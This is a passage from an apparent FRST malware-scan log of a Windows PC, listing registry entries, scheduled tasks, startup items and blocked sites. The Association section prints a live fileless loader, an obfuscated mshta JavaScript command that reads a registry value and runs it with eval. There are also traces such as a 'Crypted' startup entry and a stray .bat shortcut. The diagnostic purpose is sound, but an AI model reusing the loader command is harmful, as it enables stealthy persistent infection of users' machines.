CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{0E55CBE1-B06A-49B6-AD8D-9EFAA0160C6F}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.57\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{218D2740-5A50-42A8-AB9F-62FF1B168782}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.69\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{29A96789-9595-4947-BEDB-0FCC776F7DB8}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.2.183.39\goopdate.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{320F0FDB-BE0A-4648-9D18-4A2C3448C007}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.79\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{38216570-5DB1-45F8-A344-B0C4E252B14B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.7\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.1\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.145\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.123\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.153\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.149\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.22.3\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.165\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{b2b568c8-3712-4a75-b806-4b3c2fdb06d5}\localserver32 -> C:\Users\Pat\AppData\Local\Temp\{e9513610-f218-4dda-b954-2c7e6ba7cabb}\IDriver.NonElevated.exe => No (the data entry has 5 more characters).
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.9\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.115\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.15\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{DB25D157-76D4-41C1-97B5-359E4A4CECEB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.65\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{e3e02f12-2adb-478c-8742-5f0819f9f0f4}\InprocServer32 -> C:\Users\Pat\AppData\Roaming\Move Networks\ie_bin\qsp2ie071101000055.dll (Move Networks)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{e473a65c-8087-49a3-affd-c5bc4a10669b}\InprocServer32 -> C:\Users\Pat\AppData\Roaming\Move Networks\ie_bin\qsp2ie071101000055.dll (Move Networks)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.111\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{fc345d4c-b8f4-4674-bff7-3c37d2e535ee}\InprocServer32 -> C:\Users\Pat\AppData\Roaming\Move Networks\ie_bin\qsp2ie071101000055.dll (Move Networks)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{fd6484ed-ebe3-4c3d-938a-8238003b41b7}\InprocServer32 -> C:\Users\Pat\AppData\Roaming\Move Networks\ie_bin\qsp2ie071101000055.dll (Move Networks)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0783D653-81CB-4EB7-9BF2-44E64A959208} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-08-30] (Microsoft Corporation)
Task: {11E5E48C-60CE-4F69-AB9C-55902607F096} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-06-28] (Google Inc.)
Task: {28152975-90B7-42E7-900C-091DDD46CB7E} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-598873941-3244639055-2830076859-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {3900F76A-BCC4-4FB8-B104-51861E74D948} - System32\Tasks\Microsoft\Support\Microsoft Fix it Center\OSUpgrade => Rundll32.exe "C:\Program Files\Microsoft Fix it Center\MatsApi.dll",RunHandleOSUpgrade
Task: {407F21CB-176E-40A8-8878-3ECD32214AA5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-26] (Adobe Systems Incorporated)
Task: {449AF0AB-6C8C-4675-9FD5-C5C890DA834E} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-598873941-3244639055-2830076859-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {45FBB47F-F6F7-43CE-94DB-CDF28E43E4FC} - System32\Tasks\Carbonite Upgrade Check => C:\ProgramData\Carbonite\Carbonite Backup\CarboniteUpgrade.exe
Task: {53D7B34F-D449-492F-8394-5B7E046BF41C} - \WSE_Astromenda -> No File <==== ATTENTION
Task: {679EF4BB-95C3-4392-AF16-C94957978289} - System32\Tasks\Microsoft\Support\Microsoft Fix it Center\MatSvc\DataUpload => Rundll32.exe "C:\Program Files\Microsoft Fix it Center\MatsApi.dll",RetryDataUpload
Task: {7171F06B-F052-4B66-B6A5-5618A65B22ED} - System32\Tasks\Microsoft\Support\Microsoft Fix it Center\ConfigExec => Rundll32.exe "C:\Program Files\Microsoft Fix it Center\MatsApi.dll",RunCollectConfigurationInfo
Task: {82FC81EA-BCD9-4597-A14B-8051DBEA3BDC} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-598873941-3244639055-2830076859-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {95DC1577-049A-4B7F-88DE-4911135A0D63} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {A18C78E6-C847-4D5A-85EC-770CB8AA2D4D} - System32\Tasks\{5F6010C8-60E5-41f3-BF5B-C3AF5DBE12D4} => C:\ProgramData\Carbonite\Carbonite Backup\CarboniteUpgrade.exe
Task: {A3E0A471-C27C-4AAE-B542-079E2E3782FC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000UA => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe [2015-02-03] (Google Inc.)
Task: {B00FEF82-3B58-4B73-A852-61A16791FB08} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000 => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe [2015-02-03] (Google Inc.)
Task: {BDCE1C65-6F94-44CA-BF30-F75979A46AB2} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000Core => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe [2015-02-03] (Google Inc.)
Task: {C3E090CF-BD96-4F43-AB76-33A8EE54D044} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {C73B4774-0928-4F97-9216-AB5AAA57715E} - System32\Tasks\{B508F217-138C-48EB-9D03-FF866B98E7D9} => pcalua.exe -a C:\PROGRA~1\INFOGR~1\DIRTTR~1\UNWISE.EXE -c C:\PROGRA~1\INFOGR~1\DIRTTR~1\INSTALL.LOG
Task: {CE0B4C58-882E-4A0E-B554-78B4505D35A4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-06-28] (Google Inc.)
Task: {D3D6E07E-F230-436F-BC3A-E341DA71B486} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-09-14] (Adobe Systems Incorporated)
Task: {D7533266-6245-4CE7-AA8D-F820C0132E6A} - System32\Tasks\HPCustParticipation HP Photosmart 6520 series => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPCustPartic.exe [2012-05-08] (Hewlett-Packard Co.)
Task: {EE407D49-773A-4E7A-AEEF-2FF2F2312DD4} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-598873941-3244639055-2830076859-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Google Software Updater.job => C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe <==== ATTENTION
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000.job => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000Core.job => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000UA.job => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\Pat\AppData\Local\d102cc\256774.lnk -> C:\Users\Pat\AppData\Local\d102cc\bd3b7a.bat ()
 
ShortcutWithArgument: C:\Users\Pat\Documents\Documents\Documents\Documents\Documents\Desktop\Default Profile - Chrome.lnk -> C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
 
==================== Loaded Modules (Whitelisted) ==============
 
2007-11-27 09:29 - 2007-04-10 06:18 - 00159744 _____ () C:\Windows\system32\atitmmxx.dll
2016-09-06 17:32 - 2016-09-06 12:00 - 05197312 _____ () C:\Users\Pat\AppData\Local\Google\Chrome\User Data\SwiftShader\3.3.0.1\libglesv2.dll
2016-09-06 17:32 - 2016-09-06 12:00 - 00147456 _____ () C:\Users\Pat\AppData\Local\Google\Chrome\User Data\SwiftShader\3.3.0.1\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Classes\a042f9: "C:\Windows\system32\mshta.exe" "javascript:aps4zK="dn4";l4n5=new ActiveXObject("WScript.Shell");rgvJb3="j";K3xch=l4n5.RegRead("HKCU\\software\\hqygkpubh\\wpazikr");Drh9rf6="en";eval(K3xch);UMuvaG1="MeHHMcMF";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\vetsecure.com -> hxxps://www.vetsecure.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\1-extreme.biz -> www.1-extreme.biz
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\1001-search.info -> www.1001-search.info
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\123topsearch.com -> www.123topsearch.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\132.com -> www.132.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\136136.net -> down.136136.net
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\139mm.com -> www.139mm.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\163ns.com -> ert0003.e76.163ns.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\17-plus.com -> 17-plus.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\171203.com -> 171203.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\1800searchonline.com -> www.1800searchonline.com
 
There are 4121 more sites.
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2006-11-02 03:23 - 2006-09-18 14:41 - 00000761 ____A C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1       localhost
::1             localhost
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Pat\Documents\Pictures\Pictures\New England 2013\IMG_8070.JPG
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\Services: aawservice => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AERTFilters => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: Ati External Event Utility => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BthServ => 2
MSCONFIG\Services: CCALib8 => 2
MSCONFIG\Services: DSBrokerService => 3
MSCONFIG\Services: Garmin Core Update Service => 2
MSCONFIG\Services: GoogleDesktopManager => 3
MSCONFIG\Services: GoToAssist => 3
MSCONFIG\Services: GoToAssist Remote Support Customer => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 2
MSCONFIG\Services: IDriverT => 3
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: LavasoftAdAwareService11 => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Roxio UPnP Renderer 9 => 3
MSCONFIG\Services: Roxio Upnp Server 9 => 2
MSCONFIG\Services: RoxLiveShare9 => 2
MSCONFIG\Services: RoxMediaDB9 => 3
MSCONFIG\Services: RoxWatch9 => 2
MSCONFIG\Services: SBSDWSCService => 2
MSCONFIG\Services: sprtsvc_dellsupportcenter => 2
MSCONFIG\Services: stllssvr => 3
MSCONFIG\Services: XAudioService => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^aa_patch.exe => C:\Windows\pss\aa_patch.exe.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Desktop Manager.lnk => C:\Windows\pss\Desktop Manager.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Digital Line Detect.lnk => C:\Windows\pss\Digital Line Detect.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^hpoddt01.exe.lnk => C:\Windows\pss\hpoddt01.exe.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^WinZip Quick Pick.lnk => C:\Windows\pss\WinZip Quick Pick.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Pat^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Pat^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Stickies.lnk => C:\Windows\pss\Stickies.lnk.Startup
MSCONFIG\startupreg: Ad-Aware Browsing Protection => "C:\ProgramData\Ad-Aware Browsing Protection\adawarebp.exe"
MSCONFIG\startupreg: AdAwareTray => "C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.1.5354.0\AdAwareTray.exe"
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\Pat\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR
MSCONFIG\startupreg: Crypted => C:\Users\Pat\AppData\Local\Temp\a.txt
MSCONFIG\startupreg: Dell DataSafe Online => "C:\Program Files\Dell DataSafe Online\DataSafeOnline.exe" /m
MSCONFIG\startupreg: Dell DataSafe Scheduler => "C:\Program Files\Dell DataSafe Online\Bin\DataSafeOnlineScheduler.exe"
MSCONFIG\startupreg: DellSupport => "C:\Program Files\DellSupport\DSAgnt.exe" /startup
MSCONFIG\startupreg: DellSupportCenter => "C:\Program Files\Dell Support Center\bin\sprtcmd.exe" /P dellsupportcenter
MSCONFIG\startupreg: dscactivate => "C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe"
MSCONFIG\startupreg: ECenter => C:\Dell\E-Center\EULALauncher.exe
MSCONFIG\startupreg: ehTray.exe => C:\Windows\ehome\ehTray.exe
MSCONFIG\startupreg: GarminExpressTrayApp => "C:\Program Files\Garmin\Express Tray\ExpressTray.exe"
MSCONFIG\startupreg: Google Desktop Search => "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
MSCONFIG\startupreg: Google Update => "C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: HP Photosmart 6520 series (NET) => "C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN29D1534V05TZ:NW" -scfn "HP Photosmart 6520 series (NET)" -AutoStart 1
MSCONFIG\startupreg: HP Software Update => C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: hpqSRMon => C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqSRMon.exe
MSCONFIG\startupreg: ISUSPM => "c:\Program Files\Common Files\InstallShield\UpdateService\isuspm.exe" -scheduler
MSCONFIG\startupreg: ISUSPM Startup => C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
MSCONFIG\startupreg: ISUSScheduler => "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RoxWatchTray => "C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatchTray9.exe"
MSCONFIG\startupreg: RtHDVCpl => RtHDVCpl.exe
MSCONFIG\startupreg: SpybotSD TeaTimer => C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
MSCONFIG\startupreg: StartCCC => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SUPERAntiSpyware => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
MSCONFIG\startupreg: swg => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: TkBellExe => "c:\program files\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: WMPNSCFG => C:\Program Files\Windows Media Player\WMPNSCFG.exe
MSCONFIG\startupreg: Yahoo! Pager => "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [{C96874A2-F109-4925-BC68-8D0BFEC8B522}] => (Allow) C:\Program Files\Yahoo!\Yahoo! Music Jukebox\YahooMusicEngine.exe
FirewallRules: [{F0EA9D66-AAF9-4663-8CCB-0CA77476E1E4}] => (Allow) C:\Program Files\Yahoo!\Yahoo! Music Jukebox\YahooMusicEngine.exe
FirewallRules: [TCP Query User{17C87D63-64CB-4C32-88D9-3C868A06B2FB}C:\program files\internet explorer\iexplore.exe] => (Allow) C:\program files\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{81FD9328-5170-4A31-8CA5-79CC878DEC29}C:\program files\internet explorer\iexplore.exe] => (Allow) C:\program files\internet explorer\iexplore.exe
FirewallRules: [{AB56FAA4-3E85-473A-B28B-E381A916FAD8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{B3E13F25-D2C2-4EFD-A5B6-FF0F9C96640E}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{728C0214-FB5A-4043-A43F-EB2D0E92F041}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{1DC76EB3-02AA-40CD-8DD9-17E4BC84151B}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{A4841D3A-514B-4925-A6F0-C81338DD4436}] => (Allow) C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{F7E2AAA9-D2F2-4EEE-80E3-E00A36BE450F}] => (Allow) C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{F6902A11-3DB9-4CD5-B2AA-55E6A6B75736}] => (Allow) C:\Program Files\Yahoo!\Messenger\YServer.exe
FirewallRules: [{1402C051-4849-4D1C-9928-9AA1DBF2AC63}] => (Allow) C:\Program Files\Yahoo!\Messenger\YServer.exe
FirewallRules: [{835A00BB-D154-4D88-9041-D47D3D7AB198}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{0658E516-9013-47BE-8F76-8059D8D5316C}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{36A31D8F-C159-4294-9BC7-9ED9282550BA}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{19C505A9-AF09-4D56-B2A1-80D01682EEB2}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqste08.exe
